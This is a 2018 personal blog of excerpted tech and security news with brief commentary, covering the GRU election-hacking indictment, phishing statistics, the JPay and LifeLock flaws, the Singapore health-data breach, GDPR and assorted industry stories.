How they
did it (and will likely try again): GRU hackers vs. US elections

In a press briefing just two weeks ago, Deputy
Attorney General Rod Rosenstein announced that the grand jury
assembled by Special Counsel Robert Mueller had returned an
indictment

… The filing
[PDF] spells out the Justice Department's first official, public
accounting

… The allegations are backed up by data
collected from service provider logs, Bitcoin transaction tracing,
and additional forensics. The DOJ also relied on information
collected by US (and likely foreign) intelligence and law enforcement
agencies.

… After digging into this latest indictment,
the evidence suggests Trump may not have made a very good call on
this matter. But his blaming of the victims of the attacks for
failing to have good enough security, while misguided, does strike on
a certain truth: the Clinton campaign, the DNC, and DCC were poorly
prepared for this sort of attack, failed to learn lessons from
history, and ignored advice from some very knowledgeable third
parties they enlisted for help.

… The GRU operation had conducted wide-ranging
spear-phishing attacks against both Democrats and Republicans as far
back as October 2015 with limited success. Members of John McCain's
and Lindsey Graham's campaign staffs, as well as members of several
other Republican congressional campaign staffs, had
their emails stolen and later posted on the DCLeaks site. But as
the presidential field narrowed, the GRU began to focus on the
Democrats and Hillary Clinton's campaign.

… Unfortunately, few if any members of the
Clinton campaign staff, DNC, or DCCC used two-factor
authentication—despite advice from outside advisors

(Related) The government hasn’t realized how
important Computer Security is. They still consider IT as
unimportant to the strategic success of the organization (like
janitorial services). The results are similar to the failures of
ignorant politicians.

The nation’s cyber spy agency is suffering from
substantial cyber vulnerabilities, according to a first-of-its-kind
unclassified audit overview from the agency’s inspector general
released Wednesday.

Those vulnerabilities include computer system
security plans that are inaccurate or incomplete, removable media
that aren’t properly scanned for viruses, and an inadequate process
for tracking the job duties of National Security Agency cyber
defenders to ensure they’re qualified for the highest-level work
they do, according to the
overview.

Perhaps most striking, the agency has not properly
implemented “two-person access controls” on its data centers and
equipment rooms.

State
Govts. Warned of Malware-Laden CD Sent Via Snail Mail from China

Here’s a timely reminder that email isn’t the
only vector for phishing attacks: Several U.S. state and local
government agencies have reported receiving strange letters via snail
mail that include malware-laden compact discs (CDs) apparently sent
from China, KrebsOnSecurity has learned.

This particular ruse, while crude and simplistic,
preys on the curiosity of recipients who may be enticed into popping
the CD into a computer. According to a non-public alert shared with
state and local government agencies by the Multi-State
Information Sharing and Analysis Center (MS-ISAC), the scam
arrives in a Chinese postmarked envelope and includes a “confusingly
worded typed letter with occasional Chinese characters.”

British regulators should be given more control
over Facebook and Google to stop the spread of “fake news” —
including the power to audit their jealously-guarded algorithms —
an influential parliamentary committee will recommend.

The interim report from the House of Commons
Digital, Culture, Media and Sport Committee is due to be published on
Sunday, but on Friday afternoon a leaked copy was published in full
online by former Vote Leave campaign strategist Dominic Cummings.

Friday, July 27, 2018

School for hackers? I’d hazard a guess that
this did not take much skill to do. Once one inmate figured it out,
he could just email instructions to all his friends. No indication
how long this has been going on.

The hand-held computer tablets are popular in
prisons across the country, and they are made available to Idaho
inmates through a contract with CenturyLink and JPay. Neither
company immediately responded to a request for comment from The
Associated Press.

The tablets allow inmates to email their families
and friends, purchase and listen to music or play simple electronic
games.

The inmates were “intentionally exploiting a
vulnerability within JPay to improperly increase their JPay account
balances,” Ray said in a prepared statement on Thursday. He said
50 inmates credited their accounts in amounts exceeding $1,000; the
largest amount credited by a single inmate was just under $10,000.

The total amount was nearly $225,000.

“This conduct was intentional, not accidental.
It required a knowledge of the JPay system and multiple actions by
every inmate who exploited the system’s vulnerability to improperly
credit their account,” Ray said in a prepared statement.

Leveraging a key human trait that machines would
not fall for, cybercriminals can easily manipulate or fool humans
using social engineering tactics. A new study on the most effective
phishing scams shows that, ironically, the subject
lines relating to security are most likely to trick users
into handling their credentials insecurely.

“By playing into a person’s psyche to either
feel wanted or alarmed, hackers continue to use email as a successful
entry point for an attack,” according to KnowBe4,
which deals with security awareness and simulated phishing.

… After examining tens of thousands of subject
lines, including some “in-the-wild” emails, researchers compiled
the following “Top 10 Most-Clicked General Email Subject Lines
Globally for Q2 2018” (frequency percentage in brackets):

Password Check
Required Immediately (15%)

Security Alert
(12%)

Change of
Password Required Immediately (11%)

A Delivery
Attempt was made (10%)

Urgent press
release to all employees (10%)

De-activation of
[[email]] in Process (10%)

Revised Vacation
& Sick Time Policy (9%)

UPS Label
Delivery, 1ZBE312TNY00015011 (9%)

Staff Review
2017 (7%)

Company Policies-Updates to our
Fraternization Policy (7%)

We haven’t heard much about the Exactis data
breach, but Troy Hunt pointed me to this record layout.

Twitter Inc on Friday reported fewer monthly
active users than analysts expected and warned that the
closely-watched figure could
keep falling as it deletes phony accounts, sending shares
sharply lower in early trading.

The company said the work it was doing to clean up
Twitter by purging automated and spam accounts had some impact on its
user metrics in the second quarter, and that it would prioritize work
to improve suspicious accounts and reduce hate speech and other
abusive content over projects that could attract more users.

The clash of technologies? Requires a thoughtful
architecture to avoid disaster.

Blockchain technology has the potential to
revolutionise many industries; it has been said that “blockchain
will do to the financial system what the internet did to media”.
Its most famous use is its role as the architecture of the
cryptocurrency Bitcoin, however it has many other potential uses in
the financial sector, for instance in trading, clearing and
settlement, as well as various middle- and back-office functions.

… in order for the technology to unfold its
full potential there needs to be careful consideration as to how the
technology can comply with new European privacy legislation, namely
the General Data Protection Regulation (the “GDPR”) which came
into force on 25 May 2018. This article explores some of the
possible or “perceived” challenges blockchain technology
faces when it comes to compliance with the GDPR.

… One of the most widely perceived challenges
of blockchain and the GDPR is the inability to delete data. The main
benefit of blockchain technology is that the blocks in the chain
cannot be deleted or modified, to ensure the security and accuracy of
the record. However, under the GDPR, data subjects have the right to
rectification, where the personal data concerning them is inaccurate,
and they may have the right to have their data erased (“right to be
forgotten”).

Law
Technology Today: “Is your staff using analytics,
blockchain and OCR yet? Corporations are ever-focused
on their legal spend and demand more value from their outside
counsel. Further disrupting the legal field are alternative legal
service providers fueling the competitive landscape to become more
crowded and innovative. As a result, Thomson Reuters’ 2018 Report
on the State of the Legal Market surmised that declining profit
margins, weakening collections, falling productivity, and loss of
market share to alternative legal service providers are chipping away
at the foundations of firm profitability. To counteract these market
pressures and to differentiate themselves from competitors, law firms
are embracing technology to improve operational efficiencies and
transform the way attorneys and their firms interact with clients,
answer their questions, and tackle their legal challenges. The law
firms that embrace technology as a means to provide more
cost-effective services to their clients will have a competitive
advantage. For example, digitization and automation technologies
have emerged that streamline internal processes and reduce workloads,
so lawyers can spend more time advising clients and less time with
administrative work…”

… Amazon does not break out financials for
advertising and lumps it into the “Other” category, which
“primarily includes sales of advertising services, as well as sales
related to our other service offerings,” according to financial
statements.

… Amazon
has become a formidable e-commerce search engine, competing with
Google to be the first place where shoppers start when they want to
buy products online. Its growing advertising business is another
example of the battle between Amazon and Alphabet-owned Google, which
compete across a number of areas such as voice technology, cloud
computing, and online shopping.

At least a dozen companies and government agencies
have been targeted and thousands more are exposed to data breaches by
hackers exploiting old security flaws in management software, two
cyber security firms said in a study published on Wednesday.

Systems at two government agencies and at firms in
the media, energy and finance sectors were
hit after failing to install patches or take other security measures
advised by Oracle or SAP, security firms Onapsis and
Digital Shadows said in the newly published report. (goo.gl/pWbz3Q)

When the “protectors” compromise your data…
Think of ‘unsubscribe’ as a GDPR ‘opt-out.’

LifeLock's identity theft protection service
suffered
from a security flaw that put users' identities in jeopardy. The
event forced its parent company, Symantec,
to pull its website down to fix the issue after it was notified by
KrebsOnSecurity. According to Krebs, Atlanta-based security
researcher Nathan Reese discovered the vulnerability through a
newsletter email he received from the service. Upon
clicking "unsubscribe," a page that clearly showed his
subscriber key popped up. That allowed Reese to write a
script that sequences numbers, which was able to pull keys and their
corresponding email addresses from the service.

… GDPR imposes a number of new requirements on
organizations that handle personal information. But one of the
biggest changes is that organizations must track all breaches, as
well as report certain types of breaches to authorities "within
72 hours of becoming aware of the breach, where feasible,"
according to the Information
Commissioner's Office, which is the U.K.'s data privacy watchdog
and GDPR enforcer

… But the data does not reveal whether
organizations are suffering more - or fewer - breaches than before.
"It's important to note that while the number of reported
breaches has increased, it does not necessarily mean the number of
breaches has increased – just that more are being reported,"
says Brian Honan, who heads cybersecurity consultancy BH Consulting
in Dublin, an who moderated a panel focused on complying with GDPR at
the June Infosecurity Europe conference in London

The biggest impact GDPR will have on organizations
is the right to be forgotten. Organizations are required to allow EU
residents to revoke their consent at any point. This means that all
that data must be removed from every system within the organization.
Unless all their databases are integrated, this could get tricky.

8. The IP Address As Personal Data

One of the key tenets of cybersecurity operations
is tracking indicators of compromise: Pieces of identifying
information that tip off whether user or network activity is
malicious. With GDPR in effect, IOCs such as a user's IP address are
considered personal data, impacting the defenders' ability to fully
use that data to identify, detect and respond to threats.

9. Third-Party Data Policy

All third-party scripts like social media
plug-ins, advertising and analytics scripts are your responsibility.
How they handle your users' data can be a liability. You cannot
assume these third-party companies are GDPR compliant just yet.
Review your third-party service providers’ security, and consider
removing most external third-party scripts until you can ensure they
are GDPR compliant.

I immediately thought this meant that the
remaining 507 members of congress were correctly matched to mugshots.
Perhaps they didn’t gather enough mugshots?

Wednesday, July 25, 2018

Recent
reports
of a newly detected Smoke Loader infection campaign and the
re-emergence of Magecart-based cyber-attacks illustrate a common
tactic used by cyber criminals and state-sponsored attackers alike ―
credential harvesting. According to the Verizon 2017 Data Breach
Investigation Report, 81%
of hacking-related breaches leverage either stolen, default, or weak
credentials.
While credential harvesting is often seen as equivalent to phishing,
it uses different tactics.

Cyber
attackers long ago figured out that the easiest way for them to gain
access to sensitive data is by compromising an end user’s identity
and credentials. Betting on the human factor and attacking the
weakest link in the cyber defense chain, credential harvesting has
become the foundation of most cyber-attacks.

… In
the case of cloned websites, the victim is often unaware of the
attack, since the fake web designs are often very authentic. When
the user enters his or her credentials, the page not only captures
them but then forwards them to the actual login page, which then logs
in the user. The victim never even knows their credentials were
stolen.

Low-Hanging
Fruit: Responding to the Digital Evidence Challenge in Law
Enforcement

Whether you believe law enforcement is “going
dark” or we are in a “golden age of surveillance,” law
enforcement faces serious challenges in identifying and accessing
digital evidence that is available and important to their criminal
investigations. Some of these problems are, no doubt, related to
encryption and ephemerality of data – the two issues that have
absorbed most of the national attention to date. But, in fact, the
problems with digital evidence and digital technologies go far beyond
those issues, as we detail in a new CSIS-issued report released
today, Low-Hanging
Fruit: Evidence Based Solutions to the Digital Evidence Challenge.
(See also coverage of the report at the Washington
Post.)

… We found that difficulties accessing and
utilizing digital evidence affect
more than a third of law enforcement cases – a
percentage that we expect only to grow over time absent national
attention to the issue.

Analytic
thinking was associated with ability to discern between fake and
real.

We found no evidence that analytic thinking
exacerbates motivated reasoning.

“Falling for fake news is more a result of a
lack of thinking than partisanship. Why do people believe blatantly
inaccurate news headlines (“fake news”)? Do we use our reasoning
abilities to convince ourselves that statements that align with our
ideology are true, or does reasoning allow us to effectively
differentiate fake from real regardless of political ideology? Here
we test these competing accounts in two studies (total N = 3446
Mechanical Turk workers) by using the Cognitive Reflection Test (CRT)
as a measure of the propensity to engage in analytical reasoning. We
find that CRT performance is negatively correlated with the perceived
accuracy of fake news, and positively correlated with the ability to
discern fake news from real news – even for headlines that align
with individuals’ political ideology. Moreover, overall
discernment was actually better for ideologically aligned headlines
than for misaligned headlines. Finally, a headline-level analysis
finds that CRT is negatively correlated with perceived accuracy of
relatively implausible (primarily fake) headlines, and positively
correlated with perceived accuracy of relatively plausible (primarily
real) headlines. In contrast, the correlation between CRT and
perceived accuracy is unrelated to how closely the headline aligns
with the participant’s ideology. Thus, we conclude that analytic
thinking is used to assess the plausibility of headlines, regardless
of whether the stories are consistent or inconsistent with one’s
political ideology. Our findings therefore suggest that
susceptibility to fake news is driven more by lazy thinking than it
is by partisan bias per se – a finding that opens potential avenues
for fighting fake news.”

Facebook’s departing chief information security
officer Alex Stamos, whose upcoming exit has been known
for months, wrote a note to staff in March amid the Cambridge
Analytica data-sharing scandal urging them to reconsider the site’s
approach to privacy, BuzzFeed
News reported on Tuesday.

In his note titled “A Difficult Week,” Stamos
wrote that the scandal—in which Facebook’s reckless approach to
sharing data on users allowed the sketchy political firm to acquire
data on somewhere
around 87 million users—as well as others such as alleged
Russian information warfare on the site were the result of “tens of
thousands of small decisions made over the last decade.” Per
BuzzFeed, he also implored his colleagues to please, for the love of
god, consider negative feedback when implementing features that
pushed the limits of users’ comfort levels, as well as limit its
data collection to that actually necessary for the company’s
functioning:

“We need to build a user experience
that conveys honesty and respect, not one optimized to get people to
click yes to giving us more access,” Stamos wrote. “We need to
intentionally not collect data where possible, and to keep it only as
long as we are using it to serve people.”

“We need to listen to people (including
internally) when they tell us a feature is creepy or point out a
negative impact we are having in the world,” the note continued.
“We need to deprioritize short-term growth and revenue and to
explain to Wall Street why that is ok. We need to be willing to pick
sides when there are clear moral or humanitarian issues. And we need
to be open, honest and transparent about our challenges and what we
are doing to fix them.”

Perspective. What are auto manufacturers doing to
transition to the “self-driving/rides on demand” future?

Ford Motor Co (F.N)
said on Tuesday it was creating a separate $4 billion unit to house
its self-driving vehicle operations and is seeking outside investors,
following a similar move in late May by Detroit rival General Motors
Co (GM.N)
with its Cruise Automation unit.

Cable providers have been wringing
their hands and pulling out deal
after deal to try to keep cable TV subscribers. Most
recently, they started bundling Netflix subscriptions with cable
packages (because bundling
is totally something customers don't hate at all).

But a new report from eMarketer
shows that their tactics aren't panning out. Not only is the rate of
TV watchers opting for Over
The Top (OTT) service on the rise — where they just watch
internet TV providers like Netflix, instead of paying for cable —
it's also accelerating faster than projected growth rates.

Projections put the number of cord cutters —
adults who cancel pay TV, opting instead for OTT — at 33 million,
which is 32.8 percent of TV watchers.

… The growth rates of the OTT providers tell
the other side of the story. Netflix
reached 100 million subscribers in 2017. Leaked documents from
Amazon
showed that it counts 26 million prime members as US viewers. Hulu
garnered a walloping 40 percent growth in subscribers in 2017,
reaching 17 million viewers. It also launched Hulu
Live TV, which is like basic cable via a Hulu subscription —
and is proving to be incredibly
popular. And YouTube and Facebook (via Facebook Watch and IGTV)
are in all-out
war to capture the millions of eyeballs to which they already
have access.

Segway
has unveiled its latest creation, and its as off-kilter as you’d
expect from the company. Taking the hoverboard trend one step
further, it’s now created the Drift W1, which essentially splits
the board in half and works underneath your shoes. The shoes will
weigh 7.7lbs and have a top speed of 7.5 MPH, with a riding time of
around 45 minutes before needing another charge.

Each pair will also come with a helmet for anyone
trying to figure out how to work these shoes without injury. The
Segway Drift W1 will cost $399 USD and be available during August.
You can find out more information from the brand’s web page.

Hackers used phishing emails to break into a
Virginia bank in two separate cyber intrusions over an eight-month
period, making off with more than $2.4 million total. Now the
financial institution is suing its cybersecurity insurance provider
for refusing to fully cover the losses.

According to a lawsuit filed last month in the
Western District of Virginia, the first heist took place in late May
2016, after an employee at The National Bank of Blacksburg
fell victim to a targeted phishing email.

National Bank said the first breach began
Saturday, May 28, 2016 and continued through the following Monday.
Normally, the bank would be open on a Monday, but that particular
Monday was Memorial
Day, a federal holiday in the United States. The hackers used
hundreds of ATMs across North America to dispense funds from customer
accounts. All told, the perpetrators stole more than $569,000 in
that incident.

… In June of 2016, National Bank implemented
additional security protocols, as recommended by FirstData. These
protocols are known as “velocity
rules” and were put in place to help the bank flag specific
types of repeated transaction patterns that happen within a short
period of time

But just eight months later — in January 2017
according to the lawsuit — hackers broke in to the bank’s systems
once more, again gaining access to the financial institution’s
systems via a phishing email.

Want to learn more about quantum
computing and how to program in the Q# language? Microsoft just
launched Quantum
Katas, an open source project that does just that by providing
you with tutorials for learning at your own pace. According to
Microsoft, these exercises are based on three learning principles:
Active learning, incremental complexity growth, and feedback.

It seems like voice
interfaces are going to be a big part of the future of computing;
popping up in phones, smart speakers, and even household appliances.
But how useful is this technology for people who don’t communicate
using speech? Are we creating a system that locks out certain users?

These were the questions that
inspired software developer Abhishek Singh
to create a mod that lets Amazon’s Alexa assistant understand some
simple sign language commands. In a video, Singh demonstrates how
the system works. An Amazon Echo is connected to a laptop, with a
webcam (and some back-end machine learning software) decoding Singh’s
gestures in text and speech.

… The actual mod itself
was made with the help of Google’s TensorFlow software,
specifically TensorFlow.js,
which allows users to code machine learning applications in
JavaScript (making it easier to run applications in web browsers).
As with any machine vision software, Singh had to teach his program
to understand visual signals by feeding it training data. He
couldn’t find any datasets for sign language online, and instead
created his own set of basic signals.

The software is just a
proof-of-concept at this point, and is unable to read any signs that
aren’t demoed in the video. But adding more vocabulary is
relatively easy, and Singh says he
plans to open-source the code and write an explanatory blog post for
his work. “By releasing the code people will be able to
download it and build on it further or just be inspired to explore
this problem space,” he tells The Verge.

On Saturday morning Forbes published an
opinion piece by LIU Post economist Panos Mourdoukoutas with the
headline “Amazon Should Replace Local Libraries to Save Taxpayers
Money.” It quickly received enthusiastic backlash from actual
American libraries and their communities.

As of around 10am US eastern time this morning,
the story had nearly 200,000 views, according to a counter on the
page. As of 11am, though, the story’s URL has been down.

Computational
Propaganda Research Program – Oxford Internet Institute –
Challenging Truth and Trust: A Global Inventory of Organized Social
Media Manipulation, July 20, 2018: “The manipulation of public
opinion over social media platforms has emerged as a critical threat
to public life. Around the world, a range of government agencies and
political parties are exploiting social media platforms to spread
junk news and disinformation, exercise censorship and control, and
undermine trust in the media, public institutions, and science. At a
time when news consumption is increasingly digital, artificial
intelligence, big data analytics, and “blackbox” algorithms are
being leveraged to challenge truth and trust: the cornerstones of our
democratic society. In 2017, the first Global Cyber Troops inventory
shed light on the global organization of social media manipulation by
government and political party actors. This 2018 report analyses the
new trends of organized media manipulation, and the growing
capacities, strategies and resources that support this phenomenon.
Our key findings are:

We have found
evidence of formally organized social media manipulation campaigns
in 48 countries, up from
28 countries last year. In each country there is at
least one political party or government agency using social media to
manipulate public opinion domestically.

Much of this
growth comes from countries where political parties are spreading
disinformation during elections, or countries where government
agencies feel threatened by junk news and foreign interference and
are responding by developing their own computational propaganda
campaigns in response.

In a fifth of
these 48 countries—mostly across the Global South—we found
evidence of disinformation campaigns operating over chat
applications such as WhatsApp, Telegram and WeChat.

Computational
propaganda still involves social media account automation and online
commentary teams, but is making increasing use of paid
advertisements and search engine optimization on a widening array of
Internet platforms.

Social
media manipulation is big business. Since 2010,
political parties and governments have spent more than half a
billion dollars on the research, development, and implementation of
psychological operations and public opinion manipulation over social
media. In a few countries this includes efforts to counter
extremism, but in most countries this involves the spread junk news
and misinformation during elections, military crises, and complex
humanitarian disasters…”

Not the most common vector of attack. Consider
why this data might be valuable.

State-actors
were likely behind Singapore's biggest ever cyberattack to date,
security experts say, citing the scale and sophistication of the hack
which hit medical data of about a quarter of the population.

The
city-state announced Friday that hackers had broken
into a government database and stolen the health records of 1.5
million Singaporeans, including Prime Minister Lee Hsien Loong who
was specifically targeted in the "unprecedented" attack.

Singapore's
health minister said the strike was "a deliberate, targeted, and
well-planned cyberattack and not the work of casual hackers or
criminal gangs".

While
officials refused to comment on the identity of the hackers citing
"operational security", experts told AFP that the
complexity of the attack and its focus on high-profile targets like
the prime minister pointed to the hand of a state-actor.

"A
cyber espionage threat actor could leverage disclosure of sensitive
health information... to coerce an individual in (a) position of
interest to conduct espionage" on its behalf, said Eric Hoh,
Asia-Pacific president of cybersecurity firm FireEye.

… Jeff
Middleton, chief executive of cybersecurity consultancy Lantium, said
healthcare data is of particular interest to hackers because it can
be used to blackmail people in positions of power.

"A
lot of information about a person's health can be gleaned from the
medications that they take," Middleton told AFP Saturday.

… The
hackers used a computer infected with malware to gain access to the
database between June 27 and July 4 before administrators spotted
"unusual activity", authorities said.

The last few years have seen Apple expanding into
India with the iPhone, but now the company is facing a serious
problem if it doesn’t cater to the demands of the country’s
telecom regulator. The Telecom Regulatory Authority of India (TRAI)
has put new rules in place in an effort to protect mobile users’
privacy and block spam calls and messages. Part of this policy
involves making an app available to every subscriber, but Apple
refuses to allow it on the App Store, ironically, due
to privacy concerns.

The regulator requires that all carriers in India
make TRAI’s “Do Not Disturb” app available for users to
download and install on their device. The app then gives users the
ability to report unsolicited calls and messages. Apple has not
allowed it on their App Store, however, due to the fact that the app
requires access to call history and message logs in order to send
reports to the agency.

While Apple has been butting heads with TRAI for
over a year now, the regulator has moved forward with the policy,
giving all carriers six months to make sure the app can be installed
on every device they offer. Any phones that can’t install the app
after that period will be cut off from the carrier’s network. As
for Android, the app is already available via Google’s
Play Store.

Imagine you’re the president of a European
country. You’re slated to take in 50,000 refugees from the Middle
East this year. Most of them are very religious, while most of your
population is very secular. You want to integrate the newcomers
seamlessly, minimizing the risk of economic malaise or violence, but
you have limited resources. One of your advisers tells you to invest
in the refugees’ education; another says providing jobs is the key;
yet another insists the most important thing is giving the youth
opportunities to socialize with local kids. What do you do?

Well, you make your best guess and hope the policy
you chose works out. But it might not. Even a policy that yielded
great results in another place or time may fail miserably in your
particular country under its present circumstances. If that happens,
you might find yourself wishing you could hit a giant reset button
and run the whole experiment over again, this time choosing a
different policy. But of course, you can’t experiment like that,
not with real people.

NASA has made its raw satellite data widely
available for a long while. Now that it has a
privatization-minded
leader, though, it's looking to make that data more palatable for
the business crowd. The administration has released
a Remote Sensing Toolkit that should make it easier to use
observational satellite info for commercial purposes, including
straightforward business uses as well as conservation and research.
The move consolidates info that used to be scattered across "dozens"
of websites, and helps you search that unified database for helpful
knowledge – you don't have to go to one place for atmospheric
studies and another to learn
about forests.

The kit includes both some ready-to-use tools for
making sense of satellite content as well as the code companies can
use to craft their own tools.

Between
You, Me, and Google: Problems With Gmail's “Confidential Mode”

With Gmail’s new
designrolled
out to more and more users, many have had a chance to try out its
new “Confidential
Mode.” While many of its features sound promising, what
“Confidential Mode” provides isn’t confidentiality. At best,
the new mode might create expectations that it fails to meet around
security and privacy in Gmail.

… With its new Confidential Mode, Google
purports to allow you to restrict how the emails you send can be
viewed and shared: the recipient of your Confidential Mode email will
not be able to forward or print it. You can also set an “expiration
date” at which time the email will be deleted from your recipient’s
inbox, and even require a text message code as an added layer of
security before the email can be viewed.

Unfortunately, each of these “security”
features comes with serious security problems for users.

… It’s important to note at the outset that
because Confidential Mode emails are not end-to-end
encrypted, Google
can see the contents of your messages and has the technical
capability to store them indefinitely, regardless of any “expiration
date” you set. In other words, Confidential Mode provides zero
confidentiality with regard to Google.

The Netflix Security
Intelligence and Response Team (SIRT) announces the release of Diffy
under an Apache 2.0 license. Diffy is a triage tool to help digital
forensics and incident response (DFIR) teams quickly identify
compromised hosts on which to focus their response, during a security
incident on cloud architectures.

… It's called "Diffy" because it
helps a human investigator to identify the differences
between instances

Why I had my Software Architecture students design
a mobile banking app.

U.S.
Bancorp this week was the latest to say it will build a
nationally available checking-account product as lenders introduce
mobile offerings that let consumers do their full banking without a
branch. The move follows similar announcements by some of the
country’s largest banks including JPMorgan
Chase & Co., Citigroup Inc. and PNC Financial Services Group
Inc.

The “fake news” concept seems to be catching
on. Definitions seem to vary a bit.

Egypt’s parliament has passed a law giving the
state powers to block social media accounts and penalize journalists
held to be publishing fake news.

Under the law passed on Monday social media
accounts and blogs with more than 5,000 followers on sites such as
Twitter and Facebook will
be treated as media outlets, which makes them subject to
prosecution for publishing false news or incitement to break the law.

Perspective. Holy Mackerel! It’s not an error,
it’s a message from God?

Type the word “dog” into Google Translate 19
times, request that the nonsensical message be flipped from Maori
into English, and out pops what appears to be a garbled religious
prophecy.

“Doomsday Clock is three minutes at twelve,”
it reads. “We are experiencing characters and a dramatic
developments in the world, which indicate that we are increasingly
approaching the end times and Jesus' return.”

Links

About Me

I live in Centennial Colorado. (I'm not actually 100 years old., but I hope to be some day.) I'm an independant computer consultant, specializing in solving problems that traditional IT personnel tend to have difficulty with... That includes everything from inventorying hardware & software, to converting systems & data, to training end-users. I particularly enjoy taking on projects that IT has attempted several times before with no success. I also teach at two local Universities: everything from Introduction to Microcomputers through Business Continuity and Security Management. My background includes IT Audit, Computer Security, and a variety of unique IT projects.